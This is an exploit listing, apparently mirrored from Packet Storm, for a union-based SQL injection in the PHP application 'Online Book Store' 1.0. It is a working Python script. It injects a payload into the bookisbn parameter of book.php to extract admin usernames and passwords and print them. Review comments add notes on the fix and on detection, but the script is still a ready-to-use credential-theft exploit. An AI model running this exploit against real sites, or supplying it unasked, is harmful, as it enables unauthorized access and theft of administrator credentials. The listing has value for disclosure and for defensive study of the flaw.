## https://sploitus.com/exploit?id=PACKETSTORM:159964
# Exploit Title: Online Book Store Union Based SQL Injection  
# Date: 2020-10-25  
# Exploit Author: ferhatcil  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://www.sourcecodester.com/php/14550/online-book-store-php-full-source-code.html  
# Version: 1.0  
# Tested on: Ubuntu 18.04  
# CVE : N/A  
  
Exploit Code  
  
import getopt  
import json  
import sys  
import requests  
import colorama  
from colorama import Fore, Style  
from bs4 import BeautifulSoup  
  
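def usage():
    """Print the command-line help text and exit with status 1.

    The banner interpolates a module-level ``VERSION`` constant. No such
    constant is defined in the visible listing, so the lookup falls back to
    an empty string instead of raising ``NameError`` before any help is shown.
    """
    version = globals().get("VERSION", "")
    script = sys.argv[0]
    print("Online Book Store SQLi {} ( github.com/ferhatcil )".format(version))
    print("Usage: " + script + " [OPTIONS]")
    print(" --domain\texample.com")
    print("Examples:")
    print(" python3 " + script + " --domain http://example.com")
    print(" python3 " + script + " --domain http://example.com/bookstore")
    # Help output always ends the process with exit status 1.
    sys.exit(1)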
  
  
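def xx(domain):
    """Request the PoC URL for *domain* and print the text the page reflects.

    The request targets ``book.php`` and carries a UNION-based SQL injection
    string in the ``bookisbn`` query parameter. The injected SELECT has seven
    columns and puts ``group_concat(name,':',pass)`` from the ``admin`` table
    in the fifth. The function prints the text of the first ``<p>`` inside
    the first ``div`` with class ``col-md-6`` in the response.

    NOTE(review): the server-side code is not shown here. The payload implies
    that ``bookisbn`` reaches a SQL statement through string concatenation;
    the usual remedy is a prepared statement with a bound parameter, plus
    rejecting values that are not ISBN-shaped. Whether ``pass`` holds hashed
    values cannot be told from this listing; confirm, and store only salted
    password hashes. For detection, a quote character or the keywords
    ``union select`` / ``group_concat`` in a ``bookisbn`` value in the web
    server access log matches this request.

    Args:
        domain: Host or base URL of the installation, e.g.
            ``http://example.com/bookstore``.
    """
    payload = (
        "/book.php?bookisbn=-x' union select "
        "1,2,3,4,group_concat(name,':',pass),6,7 from admin -- -"
    )
    # Prepend a scheme only when the literal 'http://' is absent from the
    # argument (same test as the original listing).
    base = domain if 'http://' in domain else "http://" + domain
    url = base + payload
    try:
        # A timeout keeps the script from blocking forever on a silent host.
        r = requests.get(url, timeout=10)
        soup = BeautifulSoup(r.text, 'html.parser')
        data = soup.find('div', {'class': 'col-md-6'}).find("p").text
        print(
            f"{Fore.GREEN}[+] {Style.RESET_ALL}{Fore.YELLOW}"
            + data
            + f"{Style.RESET_ALL}"
        )
    except Exception:
        # Best-effort: any request or parsing failure is reported the same
        # way. Unlike a bare ``except:``, KeyboardInterrupt and SystemExit
        # still propagate.
        print(f"{Fore.RED}" + "[-] Error" + f"{Style.RESET_ALL}")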
  
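if __name__ == "__main__":
    # Command-line entry point. "d:" and "domain=" take a value; "h"/"help"
    # are registered with getopt so the help branch below is reachable.
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hd:", ["help", "domain="])
    except getopt.GetoptError as err:
        print(err)
        sys.exit(-1)

    # No recognised option at all: show the help text (usage() exits).
    if not opts:
        usage()

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-d", "--domain"):
            xx(a)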